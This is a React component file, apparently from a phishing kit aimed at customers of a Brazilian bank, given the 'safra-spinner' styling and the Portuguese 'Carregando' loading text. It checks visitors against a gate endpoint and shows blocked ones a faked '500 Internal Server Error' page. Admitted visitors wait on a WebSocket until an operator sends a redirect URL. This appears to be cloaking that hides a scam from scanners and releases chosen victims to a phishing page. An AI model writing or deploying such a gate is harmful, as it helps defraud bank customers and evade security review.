import { useEffect, useRef, useState } from "react";
import axios from "axios";
import { API, WS_BASE } from "@/lib/config";

const Error500 = () => (
  <div
    data-testid="error-500-screen"
    style={{ minHeight: "100vh", background: "#ffffff" }}
    className="flex flex-col items-center justify-center font-mono text-neutral-800 px-6"
  >
    <h1 className="text-2xl font-bold tracking-tight" data-testid="error-500-title">
      500 Internal Server Error
    </h1>
    <p className="mt-3 text-sm text-neutral-500">
      The server encountered an internal error or misconfiguration and was unable to
      complete your request.
    </p>
  </div>
);

export default function ClientGate() {
  const [status, setStatus] = useState("checking"); // checking | waiting | blocked
  const wsRef = useRef(null);

  useEffect(() => {
    let active = true;

    const run = async () => {
      try {
        await axios.get(`${API}/gate`);
      } catch (e) {
        if (active) setStatus("blocked");
        return;
      }
      if (!active) return;

      const ws = new WebSocket(`${WS_BASE}/ws/client`);
      wsRef.current = ws;

      ws.onopen = () => {
        if (active) setStatus("waiting");
      };
      ws.onmessage = (ev) => {
        try {
          const msg = JSON.parse(ev.data);
          if (msg.type === "release" && msg.url) {
            window.location.href = msg.url;
          } else if (msg.type === "blocked") {
            setStatus("blocked");
          }
        } catch (_) {}
      };
      ws.onerror = () => {};
    };

    run();
    return () => {
      active = false;
      if (wsRef.current) wsRef.current.close();
    };
  }, []);

  if (status === "blocked") return <Error500 />;

  return (
    <div
      data-testid="client-gate-screen"
      className="flex flex-col items-center justify-center"
      style={{
        minHeight: "100vh",
        background: "#0d1321",
      }}
    >
      <div className="safra-spinner" data-testid="client-loading-spinner" />
      <p className="mt-8 text-white/60 text-sm tracking-[0.25em] uppercase">
        Carregando
      </p>
    </div>
  );
}
